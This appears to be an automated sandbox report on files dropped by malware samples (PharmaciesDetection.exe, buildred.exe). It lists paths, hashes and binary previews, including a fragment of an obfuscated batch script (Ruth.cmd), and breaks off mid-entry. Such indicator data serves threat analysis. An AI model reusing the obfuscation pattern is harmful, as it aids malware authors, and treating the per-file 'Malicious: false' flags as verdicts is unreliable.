r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r............................................

C:\Users\user\AppData\Local\Temp\Harley

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe
File Type:	data
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	6.512785069283945
Encrypted:	false
SSDEEP:	384:FeVrnIhTMdtEo3/Tv1IkV/HwG68pc/v5sPrBzN02WsxkGVY0VlqhO1URH+esp8e/:FXymo3/TpwGHsv5sPrBzN02WsxNVY0Vd
MD5:	A598DA32EC9FBE430A0C33A1AC680E1C
SHA1:	6B1AF135E996D56B24618914733CDE7716B1DC53
SHA-256:	AF5A342B23BF7678578753C7ACEBA58163E4D8BC5A064D57D970A3C306407B81
SHA-512:	66937CFBFF4D7B7D627D99774E37BDCC6152DB87982DB9EE9D1E757FA319508F8FC2B4115CB7DF989757206F23D8AE587C6EF2494580B79AE5D4032B9763AC00
Malicious:	false
Preview:	P.L$..oe...D$...P.u..W....I...j.j..H.....u...L$.....E....I....Q...Z..J...t...t..I8.A.........t..I8.A......z...B.t..@8.@......I._^3.[..]...U..E.SVW.@....0...(....^..C...u..5\|#M.....I.....I........E....Pj.....I.....uE.u.........&..F........H..\|9...D9.t..@8.@......\|9...D9.t..@8.@......V....I...u0.u........&..F........H..\|9...D9.t..@8.@.......3P..W..YYV....I..5\|#M.....I.....I.Vj.....I...u;.u....7....&.3.B.V....H..\|9...D9.t..@8.P..\|9...D9.t..@8.@......I._^3.[]...U..E.VWj..@..0.4.......w....u...Y........>3._.F.....^]...U..QQVWh.........YP.M...B...}.3.f...E..@..0......F.h....W.0....I..M..E.P.v....E..(.u.j.P.J...W......._3.^....U..S.].VW.{...s.r..v....0....F..8.C..0.......W...6.......j..F..0....I..u...........>3._.F.....^[]...U..QW.E...Ph....j.h.~L.j.j.h......X.I...u=V.u........&.3.B.V...^.H..\|9...D9.t..@8.P..\|9...D9.t..@8.@..3._....U.....E..e..VW.@....0...]....V..M...E.B..E..B..E.B..E....b....u..u.....I..E.P.......t.j..E.P.E.P.[....M.P.3....9...H..\|9...D9.t..@8.@......\|9...D

C:\Users\user\AppData\Local\Temp\Means

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe
File Type:	data
Category:	dropped
Size (bytes):	61440
Entropy (8bit):	6.661056883889966
Encrypted:	false
SSDEEP:	768:08qcDP8WBosd0bHazf0Tye4Ur2+9BkxXNHMi0O0GmpefK7:0DWyu0uZo2+9BkxXibleE
MD5:	1F09FF6F831773E34531C68138C0280E
SHA1:	85E0BF9DEEEF07F2C3D481B363A4DCDD837BCBBB
SHA-256:	6BCE7BAD45476E1CE91FECD6BD648DEED5E9B7C23DC327E80EE41E7712AB7BD2
SHA-512:	FDE2D0BD2FCF5171FD4662CD802D0B9134C3A90A03703C797DE3130D6EDB229C5F5DCD925C7C6C57BAA7AADA82B3DD6E8186B893921F681E586EFBB6ABC45DB4
Malicious:	false
Preview:	.e.m.e.n.t. .i.s. .m.i.s.s.i.n.g. .".E.n.d.S.w.i.t.c.h.". .o.r. .".C.a.s.e.". .s.t.a.t.e.m.e.n.t...H.".C.o.n.t.i.n.u.e.C.a.s.e.". .s.t.a.t.e.m.e.n.t. .w.i.t.h. .n.o. .m.a.t.c.h.i.n.g. .".S.e.l.e.c.t.".o.r. .".S.w.i.t.c.h.". .s.t.a.t.e.m.e.n.t.....A.s.s.e.r.t. .F.a.i.l.e.d.!.....O.b.s.o.l.e.t.e. .f.u.n.c.t.i.o.n./.p.a.r.a.m.e.t.e.r...4.I.n.v.a.l.i.d. .E.x.i.t.c.o.d.e. .(.r.e.s.e.r.v.e.d. .f.o.r. .A.u.t.o.I.t. .i.n.t.e.r.n.a.l. .u.s.e.)...+.V.a.r.i.a.b.l.e. .c.a.n.n.o.t. .b.e. .a.c.c.e.s.s.e.d. .i.n. .t.h.i.s. .m.a.n.n.e.r.....F.u.n.c. .r.e.a.s.s.i.g.n. .n.o.t. .a.l.l.o.w.e.d...*.F.u.n.c. .r.e.a.s.s.i.g.n. .o.n. .g.l.o.b.a.l. .l.e.v.e.l. .n.o.t. .a.l.l.o.w.e.d...........(...0...`.........................................................................................................................................................................................................."".!...............!!.#3S33"!.!! ............$3W3SCS"!..............&#C3W6#bbB!!.........!!$36$$2S433b2.........

C:\Users\user\AppData\Local\Temp\Moment

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe
File Type:	data
Category:	dropped
Size (bytes):	35840
Entropy (8bit):	6.468742273417834
Encrypted:	false
SSDEEP:	768:otAak7jbWyw2QH4IYkNe4yU6en8FZ++oUhPtLuyfGby2QTcBMHa9kV6tjwqLDEtk:ow7fWJhNz96en8FZ/oUhPDZcBMHa9kV2
MD5:	C375C2895142B156B4F7B71A016C6D8B
SHA1:	E5165A99047029FD415F7D5801E002BBE1F6D665
SHA-256:	9C9D3482EE9EB7860B0C69C9D68754A33FC65C52E055E8E787486673AB341C2B
SHA-512:	6EAC28CD7A6E84F287F8B35065658B2CA74B48A53CEBB09FD38434D7DC0C93B91FDAB33CEA58387A297B5818DD0BEAE163915B993192AE288A7FB4668340BC90
Malicious:	false
Preview:	}........;........}..E...@..P.u.V.u..u.............}.........;}.u..x..........t.;.....v..Fh............."R...E.;F\|..M?...}....K..........M....M.%.....].=....u%............%...............M.].M.M.........M.%....=....u.............%.........M..........u.9U............}...v)........ .L.............M ,K......K......F@.M.....;.......;........C..........E.;...r..... u.......w..F@....;...V....U........C......E.U.........C.3.U.E..Bt..U...Ou..E..............3..E.........U...~......E.........U...h3..E.........U..E........U..C.3....E......U..E..;..H............H+.....U.....,K.....,K..U.E..u..E......}......Y..E..].t4%....=....u%.........%..................E..]....E..H.......}..t0...v+........ .L..E...........M ,K......K..E.........w..F@.M......}........E.ti;........E.;F\|...<.........E...%....=.....E.u".........%.........E...........E.9M...v...9M...m...G;.~..4.E....\|,;F\|..6<.....9M...I...9M...@......G.E.;.~.E..M.;........}.....:...}.....}.......;.}a;F\|........8

C:\Users\user\AppData\Local\Temp\Olive

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe
File Type:	data
Category:	dropped
Size (bytes):	72704
Entropy (8bit):	7.997293675616384
Encrypted:	true
SSDEEP:	1536:P63WVS237cc9HY2D67NpiLqC8NLJ+OznoYUO+ghQR8:P63WVS237I2ONJjNLJ+llvDO
MD5:	157B36496A4225E1457EA8339668C2E8
SHA1:	421FA3EC7B1B82CA3B33070209B49A9CA39C7E2F
SHA-256:	45DFDAFEBFAC3FE00A6DBD7029B3AF8D9578D8E70F2ED172F548D4832F987645
SHA-512:	87746469A2888F7891EAA8E2AA336E4579D4780B5848990E74D66FA0993CA529617EEE184365E59456C52789D319A18DD76182887AC20A71CB3AE5C3339DA5F7
Malicious:	false
Preview:	.U..o....E..aJ.....].< ..e...v..F.q7Rh5.s7[x...V.\D.t...'.7....7....P........5.m.'...S.<(Ts..6.g.3...H%..u..F.5..M.....)H..?..m..{...w.w.\|._,lB.........M>...W..+:.F.+......?..Q....e.59..6..]..L..IH.G].Y.,;6....F1?......W.Vzp.-K..G.T.'(.x.......pi....J...=~Y...CR...:........E1[Iz._.....1.I....'5.?..J.u..T..[;..4]...U,;1.............t.\4.._.W.b../A".4...."./......X....3.....,{H.Y.........<H.w..+c.h...../....z.1.&...............V..]...t...."3..i. 1...6.M..r.-@.\q.T.y.........8.N.....~...h"e +...........-...\|-R.#.gM..v.#@...^Gq..coL..=2....8....-...WXo.~.w2ptL.C...!r.C.....%u..6... .H %..w0....o.B\|-.Y..q.;]'.....x;=...E.8m@.....2T..W..u...Ul.]..[A..OT2..B..N...ull.....>...-x..3...).8d_.UO.yUF..t;.dl.../...C.@^..2s.....R....iG.O/H%?B.CcQ].vJ...)..@7......:..v ....&p..X.F.q[.`...5Q_....n..[%.P..(h.(.}...'.".9."........my.&...t..0.oT..e5.Q.t+..6I..8[.!B6.!....>.$C.....a^....5K....,...%..#..w[....Y.................Fa..#~.i ........U..

C:\Users\user\AppData\Local\Temp\Provide

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe
File Type:	data
Category:	dropped
Size (bytes):	24576
Entropy (8bit):	6.6128670749383565
Encrypted:	false
SSDEEP:	384:NwMiVVn76VTBrg+8cm0hZtLvQHC4AvAaQJpXuCECW/Zv+PqraAGjNWyIjGuv3NIB:u5ATBrJ8oDLIi7AhJpzEzZGCrRyIjd3U
MD5:	4AE56B1EA9426E108A92773B1D849A9A
SHA1:	C85A0A134FADBAB5D8BCC4F918BE683584BA2E3A
SHA-256:	ED896CBF5263298907D8A47FE2B177AD1B1A93927CDE77B18FA1FDEB51B52313
SHA-512:	94D495A148D8108D5AC31D6D05DAA20EE50132AF5818184F79F2EE274E19F44028AF09ED4C47F7D887F9644B01462E04D018830D842853439DB678AF705EDD52
Malicious:	false
Preview:	0\|.}.;u........}..u..M...](.U.js_.C +C....E..E....U...f...E.j._..f....f.2..}..U.;........u....j X;.E.s......CP;SL~..SL.K$....A.;.t.....u....E.f.A..C4.<G;.r..}.......}..u..M...M...](.U..M.jq.C +C....E..E.#..U.^..f..j.X..j f.:..X;..U...}......CP;{L~..{L.K$....A.;.t.....u.. ....E.f.A........9SH.......KH.......".......E..4..IL....j.Z.E.+...............j.X.......S............P............P.......M..W..........T....F +F..U...j.Y.E.3.;..U.j....3.;.....X.....f......f..j.^..f....f......f...I.....KL.....KL..E..U.....E..u../....U..............M.....jEZf9Q.j\Zu.....!j....L..I.."...Y.........M.j\...Z.E..[....E..P....M(.A`......o....U...M...%p........f..j.X..U....u.....M.E..E..M.......>..}.#......;...}...........#.......#..u..........}..X....E.E..Y....},+....M....}..V...j\[;...i...jE[f9^...\...3....]..]........F.j:Yf;.t.j.Yf;.t.j=Yf;...,....U....d....u.........3..E.E(j:.X.Xf9F...S....N.j^Z.M...f9.u..E.E.E.A...M..U.+...................E.M..t.j.Y;...3....3.... ........M......

C:\Users\user\AppData\Local\Temp\Psychiatry

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe
File Type:	data
Category:	dropped
Size (bytes):	14025
Entropy (8bit):	7.987441054592208
Encrypted:	false
SSDEEP:	192:ocJnPPTIIbeFLio+J7fo/pzo58rUeHX9yMaVVj8FFPJrxEKgu6xhPm3oucsutQSV:35PrVbYLio+JL2eneHRaVVsfshPm3dob
MD5:	1B5740767511DFB227EE4394EC636127
SHA1:	C623CD657C2AEB46BC5AD4E74E833D1FA223B2B7
SHA-256:	487A4DA35ECFA61FBEAC8DBD9C9DA4819544C870A48EC104817C592BB1C1F37A
SHA-512:	E086431BF018C184631FE3E492CE79A063272EECF55940B4264F8E7260CD25E0EE9F51786D565628E96B70B0EED91DB084E04025A4C191FC144BD29A06E94C0F
Malicious:	false
Preview:	.VJ...N...vR..0...["!c..{7.`.zO.;.E..}..0&.\.....8.4.h...... .B.. ....#4.".......U...g<.B.B..7sB..@..`.5..i....Q...w.......]B.`...@U...&.8I.8....Crr..`...U.U.\.E....#.9.%.E^]H.z.w.......:........%....JP..jq.k,.....k..7......I.{-..8...\|.\...VR.........w.$S.....[#....q.\|....C..>."nz.&........b.n........p....9z......\|..V..P:#[..J...x3..n..0..y....m.:...9.`._M.....q.h....q.).......o.+..#C.1K......!..\(<`..x....cT9...N..........v...u.........V..O..B....x.R(........@..1....h%\|.....aV..V....,..<q.....6..9.U.b5......:.{.`d\|W..4.A.}..l.7tL...\| ...(m.'.&..zP..Ms..tk.T.....>....w=...mR$.}..*.+..~..y[s.}Y....u....x.=.....x..0.E.".....[..R....... V.U..NZ..l......Y..[.....\1...^.t.Cv...Zr..]g..............U:..2(>.&<.L...@.s....I.1..H....U..r..#.L..H.....3"...A...,.e..u.k.`.....#.j.....g9.~..a2.l.+..B...W..tA........................<...:..Tc..!%g.Y..}...%].....Y..h.(...t......k..P.b......swo.J.D.029.P...5..P..8...\..2....t^.....z.~w@6k..n....}u....f`

C:\Users\user\AppData\Local\Temp\Pulling

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	6.656799503621816
Encrypted:	false
SSDEEP:	192:n4mrTFIyADVTcSEuyJ+ISlkaDxp7dQ9k9k6vlGs:4EIyAZTcdl+ISlNx+j69R
MD5:	9BF05E462BD34FD8D07AD1D6C999BC99
SHA1:	B40F67619BB3ADB12D62EF44AA72F765AC4AF057
SHA-256:	E4DA03EF6C2D974042B126C483BC750FC1A6F831B3988E99EC7D82BE33C7999A
SHA-512:	749757694599F5C241D107CC54FB9FC2FC083AD56BDBA60F21A41340795CFAC37FEBA9D3A416287744CA1FB620A42F3A8DBDEAE65A1E6A741E91E33A57419D56
Malicious:	false
Preview:	.......F.;B.tO.....B.+.u...~...B.+.u...~...B.+.t.3.......M........N...B.+.t.3........E......3.........F.;B.tO.....B.+.u...~...B.+.u...~...B.+.t.3.......M........N...B.+.t.3........E......3..........~...B.+.u...B...~.+...]...3.......M.........M......1+.u...q...B.+.u...q...B.+.t.3.......M........I...B.+.t.3........E.......V.M..u.......+.u...Q...F.+.t.3.....I...F..M..u.......+.u...I...F..E.....E.....3.^[]...B...B.o"B.+%B...B.C.B.."B..$B.<.B...B..!B.i$B...B...B.K!B..$B.y.B...B.. B..#B...B...B.. B.E#B...B.].B.( B.."B.V.B...B...B.."B.........L$...D$...\|$.....<...i....... ....................%(.M..s..D$......%..L........f.n.f.p.............+......vL..$......$.....f...f..G.f..G f..G0f..G@f..GPf..G`f..Gp.................u.....%..L..s>f.n.f.p.... r........G... .. .. s.......tb.\|.........G..D$..........t...G.........u.......t...............t ..$.............G.............u.D$....S..QQ......U.k..l$....(VW.{.3.....M.f;.u..C..A....=$.M..........%....j.^=....w.....+j.f......Z..

C:\Users\user\AppData\Local\Temp\Ranch

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe
File Type:	data
Category:	dropped
Size (bytes):	37888
Entropy (8bit):	6.351472271518469
Encrypted:	false
SSDEEP:	768:x5/RUIDn1hGNfgN/ROqVlHBjLAbjBVELX2vn0bU7TTF7Fy2UTZ7IVs:XiAh2QOSlh3wTYGvn4Ufp7Q2Ul7J
MD5:	6A2E7DA1FE0B6D4BA04630CD71A7175F
SHA1:	D5EAE8C8AFF5445B0CB9701EE58FC0F948222C3A
SHA-256:	1CEC9DB07DC2944675E16550286A48FEE8EA2FF23B2E14C26AEF171C3587B001
SHA-512:	0C07A214AFCCB8BB6346EF6B1CB679D37B82454CB9AD8D7622142A7703B506965187CA71564009348B20F692A4E8E9F669F7C2C236632CAA4AB03861572F0949
Malicious:	false
Preview:	F......O...{...U..QVW..3.F.O...;....W...G....9G....W...W....E.....G....O......._^....U...dV.u..M..V....x.....X..SWj.3..E...~.._v(.J..y....%X...].."..........&X......&X...F....y.....X...~..v..p.....4...F........u..M..E.PV.].]..E......y....}..........W...F....c.....E.8]....W...M..3...E.8]....W..VP..M......].YYj.^9s....X.....~3..j..s..o_..Y.M.Q........C._[3.^....U..VW.u.......Y.G..p...tG.F....3.G.j.Z.........Q.P_....6..Q.u.P.Vo..j..._............G..._^]...j.X.U...(SVW..}.j.Y.. K....U..H..E.f..u...x............f.DE.f..K...y.E.3..._^f..C[u.....2...U....V.u.W3.G9~....W...F..M..0.....M....._3.^....U..QQV.u.W...~..v..F..H..4......tB...t=......W...F..u....0.P......2.....t._3.^...........u..2......u...V.]......F.....3.@9A.t..y..t..y..t.2..U..VW.}...;.t..~..t..1..W...c.._..^].......u.N.;O.t..w........V........u..1.....^............^.U..E....SVW.H...t..x..D....@.f..@\|.f.._..3._^..[]...f..t..?V....U...0SV....M.Wf.E.3.3..u.jdf.E......M......].f93........$.......s.. ....

C:\Users\user\AppData\Local\Temp\Ringtones

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe
File Type:	DOS executable (COM, 0x8C-variant)
Category:	dropped
Size (bytes):	44032
Entropy (8bit):	5.635046713265792
Encrypted:	false
SSDEEP:	768:gl/nqYHjWYPCy8CRrGPL5Eg10uVGHj9/viMxYWDOgZHHVzJWkQxZaT4:gNnqYHjZV8CVGD5EDuVGHj1vtKs51Vql
MD5:	E3E0B837BE28298815201C73FC5A3BAB
SHA1:	8642C3A3BC018A1865FE7A27A2A64155F116EE2D
SHA-256:	9957EED2B201572A696317F22C825099E6753E2F6E3B0EF243BD3431294D007B
SHA-512:	FC129CC7E548E4FE3C54FB1463BCFF1D3EA9EBC9852532850A3E0C7BCDEC7E23C15E4A5E899DB96D9882F4B1AC36495A26E6B9993578A584993AA2B67385D42D
Malicious:	true
Preview:	..I....D$ PW..............Y;.......3.......9u.uz9u.uuV...Ph.....E.3..U..D$...ub..us...\|$..D$.P.D$$PW.......uw........t.VP...........t$..E..u............Qh.....u...x.I._^[..]......u...u....t$..\|$..R.A......\|$..\|$......z....u..\$..D)M...............7...h......k..Y..D)M.j,.D$ .D$0V...P...Y..D$40.........D$(....D$L.D$(.D$,.....D$P....PVWS....I..........D$0..........S....I..D$...~.VS....I.;.t.F;t$.\|......;............D$ x&.D$(Pj.VS....I...t..D$0....t....y.D$ .T$..N..p..L$$.T$L;t$.}2.\|$..D$(Pj.VS....I...t..D$0....t.F;.\|.\|$..D$ .L$$h....P.F.PQS....I..t$...j..Y.t$.VW........._....:...U..QQSVW.}...(M.W.......0)M......9}.u/3.9............E.P....I.VW.u..u.V..........I..\|.u..b....E....tR..D)M...............t<...t7...t2...t-3.9p.t&.E.P....I..D)M..M.V.3.u.....u.V...p....M...E......Q.u.j{W..x.I._^[....U..SVW.u...(M..1.....0)M..u.....>...uA.v..........tA..D)M.....1V......F..t.j.Wh.....3..H.I............V.v.j+.u...x.I._^[]...U......\...SVW.u...(M......u..D$..D$HPV....I..t$L.D$..t$LP.....

C:\Users\user\AppData\Local\Temp\Ruth

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe
File Type:	ASCII text, with very long lines (1017), with CRLF line terminators
Category:	dropped
Size (bytes):	13541
Entropy (8bit):	5.0230071746545315
Encrypted:	false
SSDEEP:	384:jGRNHwstM6FM1g2iLOvu5pCP8VJAP/VmjJnHgi:irwsnxi8pI8PAFmFAi
MD5:	9E17257439AB3DEFC0B3AAE737EAEE80
SHA1:	A9C14852315854726BB75A2702A11CAB4E7263A9
SHA-256:	4EF2DF5760049AD16B8860E7BEFBEDE0C650B2BF0D797612BA0502B6CA064235
SHA-512:	31B632F4537CC0E8EEAD424A7362F105EF4942A6286AE47C48CD44BB16C392F65637350841676962CAB336BCE54075CD6EC376564BE89C39450D159BD432CBC6
Malicious:	false
Preview:	Set Apartment=o..xaxxParking Were Seen Implications Behaviour ..ZYNmReasons Ti Korean Arkansas ..jCNightmare Offense Afternoon Artistic Exhibition Gp Sas ..tuIGenerally Unsigned Cottage Near Sixth Nightlife ..PeARocky Nutten Blame Year Fundamental Mate Sr ..iPGPOmissions Travis Ja Archive Enterprises Hundred Tiger Store Bodies ..ZPJUMpeg Receptor Require ..yThbGrenada Header Va ..sBRentcom Cg Drove Webmasters Threesome Calculation Intersection ..FFUProtocol Blue Controversy Possibly Pathology Numerous ..Set Controllers=T..VJFriendship ..hIUPeter Livesex Moving Cardiff Detroit ..cWsDive Dick Bruce Lately Wires ..MupEmployees Oxide Cached Bradley Quantity Spouse Inquiry ..FvShip Nintendo Bunch Urgent Fs Battle Mitchell Stockholm ..gLgCell Ser Scientific Concerts Bangladesh Salem Regards ..noAi Greenhouse ..Set Italian=w..ppdMorrison Institute Penny Yields Meter Obtaining Leaves Cliff Documented ..bEaWanting Tradition Around Distinguished ..QJFinances If Types Transferred Webster Nt Charl

C:\Users\user\AppData\Local\Temp\Ruth.cmd (copy)

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with very long lines (1017), with CRLF line terminators
Category:	dropped
Size (bytes):	13541
Entropy (8bit):	5.0230071746545315
Encrypted:	false
SSDEEP:	384:jGRNHwstM6FM1g2iLOvu5pCP8VJAP/VmjJnHgi:irwsnxi8pI8PAFmFAi
MD5:	9E17257439AB3DEFC0B3AAE737EAEE80
SHA1:	A9C14852315854726BB75A2702A11CAB4E7263A9
SHA-256:	4EF2DF5760049AD16B8860E7BEFBEDE0C650B2BF0D797612BA0502B6CA064235
SHA-512:	31B632F4537CC0E8EEAD424A7362F105EF4942A6286AE47C48CD44BB16C392F65637350841676962CAB336BCE54075CD6EC376564BE89C39450D159BD432CBC6
Malicious:	false
Preview:	Set Apartment=o..xaxxParking Were Seen Implications Behaviour ..ZYNmReasons Ti Korean Arkansas ..jCNightmare Offense Afternoon Artistic Exhibition Gp Sas ..tuIGenerally Unsigned Cottage Near Sixth Nightlife ..PeARocky Nutten Blame Year Fundamental Mate Sr ..iPGPOmissions Travis Ja Archive Enterprises Hundred Tiger Store Bodies ..ZPJUMpeg Receptor Require ..yThbGrenada Header Va ..sBRentcom Cg Drove Webmasters Threesome Calculation Intersection ..FFUProtocol Blue Controversy Possibly Pathology Numerous ..Set Controllers=T..VJFriendship ..hIUPeter Livesex Moving Cardiff Detroit ..cWsDive Dick Bruce Lately Wires ..MupEmployees Oxide Cached Bradley Quantity Spouse Inquiry ..FvShip Nintendo Bunch Urgent Fs Battle Mitchell Stockholm ..gLgCell Ser Scientific Concerts Bangladesh Salem Regards ..noAi Greenhouse ..Set Italian=w..ppdMorrison Institute Penny Yields Meter Obtaining Leaves Cliff Documented ..bEaWanting Tradition Around Distinguished ..QJFinances If Types Transferred Webster Nt Charl

C:\Users\user\AppData\Local\Temp\Scout

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe
File Type:	data
Category:	dropped
Size (bytes):	61440
Entropy (8bit):	6.172007656973097
Encrypted:	false
SSDEEP:	1536:LgEtEq2fG8YWqbmJYT5yXDlY9/UL4sgTNU+ufxv5I:L9t68cCWlrss4M5I
MD5:	F0EA4942F09528F44E39ACAE9C2F06BC
SHA1:	259FB0A1FEA589A7FA1B290CEA91879046D08CE8
SHA-256:	2405E33214050C56649FD0FAB58B486F8CC98C1242EA94EBB1CEA897575DCAF5
SHA-512:	E0D0275C9CBA31164388A190CD2BF082DEDAAEC12EE8395C025352A6851E3553E51AC3EC97D246892778307B66B7CF1B7F86778FF369921D1C625274ADAB6152
Malicious:	false
Preview:	...L..TG.....L.........L.........L.........L.....f....L.......L...I.....L..WG... .L.......$.L.......(.L.......,.L.....f..0.L.....4.L...I...@.L..XG...D.L.......H.L.......L.L.......P.L.....f..T.L.....X.L...I...d.L..XG...h.L.......l.L.......p.L.......t.L.....f..x.L.....\|.L.D.I.....L.<YG.....L.........L.........L.........L.....f....L.......L...I.....L..ZG.....L.........L.........L.........L.....f....L.......L...I.....L..[G.....L.........L.........L.........L.....f....L.......L.d.I.....L...A.....L.........L.........L.........L.....f....L.......L.h.J.....L.t.G.....L....... .L.......$.L.......(.L.....f..,.L.....0.L...J...<.L...G...@.L.......D.L.......H.L.......L.L.....f..P.L.....T.L...J...`.L.H.G...d.L.......h.L.......l.L.......p.L.....f..t.L.....x.L...J.....L...G.....L.........L.........L.........L.....f....L.......L.(.J.....L.s.G.....L.........L.........L.........L.....f....L.......L.L.J.....L...G.....L.........L.........L.........L.....f....L.......L...I.....L.%\G.....L.........L.........L

C:\Users\user\AppData\Local\Temp\Stylus

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe
File Type:	data
Category:	dropped
Size (bytes):	37888
Entropy (8bit):	6.536743940945966
Encrypted:	false
SSDEEP:	768:2GY3PV7p180HcjRChcjDhU/RWEOrsaQ8UEd39+rdQLnBb2xXLDNxFch4A0:63Ppp180HcdCKjlWF0nQi9+knILDTJ
MD5:	04FB7D0A81DF5BD49F816A03E761DE1A
SHA1:	6923B7A465C7AB49546B735827B9B1A210B74BA9
SHA-256:	FDD32FF1BF55CCCAD61460D636A0FDECF52650584D1A0B70A8D424A167B14F32
SHA-512:	CB95AD9EDC7CED4905C87A72B186D8AD3283FA18424E6A40F7A8D6C1040FAD21F3EA1FB276257B91AC8C00C6FEA8AD83CB8C5086B313FCD5F9D40F38C6B72F15
Malicious:	false
Preview:	e run in DOS mode....$..........;...h...h...h4;mh...h4;oh...h4;nh...h..[h...h..i...h..i...h..i...h...h...h...h...h...h...h..i..h..i...h..ch...h...h...h..i...hRich...h........PE..L......`.........."...............................@.................................!Z....@...@.......@.....................T...\|....P..h............L..`&...0..,v...........................C..........@............................................text............................... ..`.rdata..r...........................@..@.data...\|p.......H..................@....rsrc...h....P......................@..@.reloc..,v...0...x..................@..B.........................................................................................................................................................................................................................................................................................................d.M.....h9'D......Y.hC'D......Y..-...hH'D......Y...F..hM'D.....Y.Q.%...h

C:\Users\user\AppData\Local\Temp\Tmp73F3.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe
File Type:	data
Category:	dropped
Size (bytes):	2662
Entropy (8bit):	7.8230547059446645
Encrypted:	false
SSDEEP:	48:qJdHasMPAUha1DgSVVi59ca13MfyKjWwUmq9W2UgniDhiRhkjp9g:bhhEgSVVi59defyfW2sDgAj3g
MD5:	1420D30F964EAC2C85B2CCFE968EEBCE
SHA1:	BDF9A6876578A3E38079C4F8CF5D6C79687AD750
SHA-256:	F3327793E3FD1F3F9A93F58D033ED89CE832443E2695BECA9F2B04ADBA049ED9
SHA-512:	6FCB6CE148E1E246D6805502D4914595957061946751656567A5013D96033DD1769A22A87C45821E7542CDE533450E41182CEE898CD2CCF911C91BC4822371A8
Malicious:	false
Preview:	0..b...0.."...H..............0...0......H..............0...0......H............0...0....H.......0...p.,\|.(.............mW.....$\|Bb.[ .w..#.G.a.K-..i.....+Yo..^m~{........@...iC....[....L.q.J....s?K..G..n.}......;.Q..6..WW..uP.k.F..</..%...X.P...V..R......@.Va...Zm....(M3......"..2-..{9......k.3....Y..c]..O.Bq.H.>..p.RS...\|B.d..kr.=G.g.v..f.d.C.?...0Ch[2:.V....A..7..PD..G....p..*.L{1.&'e..uU)@.i....:.P.;.j.j.......Y.:.a..6.j.L.J.....^[..8,."...2E.......[qU..6.].......nr..i..^l......-..m..u@P;..Ra."......n.p.Z..).:p).F($..\|.R.!9V.....[.gV...i..!.....=.y{.T6.9.m..+.....(2..\..V.1..].V...q.%.4.a...n.B..Q..g.~N..s....=iZ...3..).......E..A.I...hH..Q%0.]...u..........h0T.P.X.A............'.....O....Py.=..3..n..c.F.$z..t..jM.E..W...i1..'...Y,r.,.+...o.}.7..kb.t'DQTV..{...#....sT..G...:..3.L.....c..b%z..e.\.EY...M;x.Z....t..nv...@Ka.....\|s>.2Qr..f,O..XJ`d....78H8.....`..);.vMcUJ.......m.G5.ib]5.h.v<.?S.{1O.Y...kb.....a&.R......E.l..."J..G.

C:\Users\user\AppData\Local\Temp\Tmp7452.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe
File Type:	data
Category:	dropped
Size (bytes):	2662
Entropy (8bit):	7.8230547059446645
Encrypted:	false
SSDEEP:	48:qJdHasMPAUha1DgSVVi59ca13MfyKjWwUmq9W2UgniDhiRhkjp9g:bhhEgSVVi59defyfW2sDgAj3g
MD5:	1420D30F964EAC2C85B2CCFE968EEBCE
SHA1:	BDF9A6876578A3E38079C4F8CF5D6C79687AD750
SHA-256:	F3327793E3FD1F3F9A93F58D033ED89CE832443E2695BECA9F2B04ADBA049ED9
SHA-512:	6FCB6CE148E1E246D6805502D4914595957061946751656567A5013D96033DD1769A22A87C45821E7542CDE533450E41182CEE898CD2CCF911C91BC4822371A8
Malicious:	false
Preview:	0..b...0.."...H..............0...0......H..............0...0......H............0...0....H.......0...p.,\|.(.............mW.....$\|Bb.[ .w..#.G.a.K-..i.....+Yo..^m~{........@...iC....[....L.q.J....s?K..G..n.}......;.Q..6..WW..uP.k.F..</..%...X.P...V..R......@.Va...Zm....(M3......"..2-..{9......k.3....Y..c]..O.Bq.H.>..p.RS...\|B.d..kr.=G.g.v..f.d.C.?...0Ch[2:.V....A..7..PD..G....p..*.L{1.&'e..uU)@.i....:.P.;.j.j.......Y.:.a..6.j.L.J.....^[..8,."...2E.......[qU..6.].......nr..i..^l......-..m..u@P;..Ra."......n.p.Z..).:p).F($..\|.R.!9V.....[.gV...i..!.....=.y{.T6.9.m..+.....(2..\..V.1..].V...q.%.4.a...n.B..Q..g.~N..s....=iZ...3..).......E..A.I...hH..Q%0.]...u..........h0T.P.X.A............'.....O....Py.=..3..n..c.F.$z..t..jM.E..W...i1..'...Y,r.,.+...o.}.7..kb.t'DQTV..{...#....sT..G...:..3.L.....c..b%z..e.\.EY...M;x.Z....t..nv...@Ka.....\|s>.2Qr..f,O..XJ`d....78H8.....`..);.vMcUJ.......m.G5.ib]5.h.v<.?S.{1O.Y...kb.....a&.R......E.l..."J..G.

C:\Users\user\AppData\Local\Temp\Turtle

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe
File Type:	data
Category:	dropped
Size (bytes):	18432
Entropy (8bit):	4.336346044366836
Encrypted:	false
SSDEEP:	96:7sIiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiKX1Od5T1A/nYYYYYYYYYYYYYYYYYYZ:NOTyuav84444W
MD5:	28150242131957A37E7234031DA8CCF4
SHA1:	78BAE72BF0E3076638633F7F7585D917D68D39FF
SHA-256:	9E790BC388FB495773FD201A994038ACE8DF4346D50EE2CDF36EE730ACF2279C
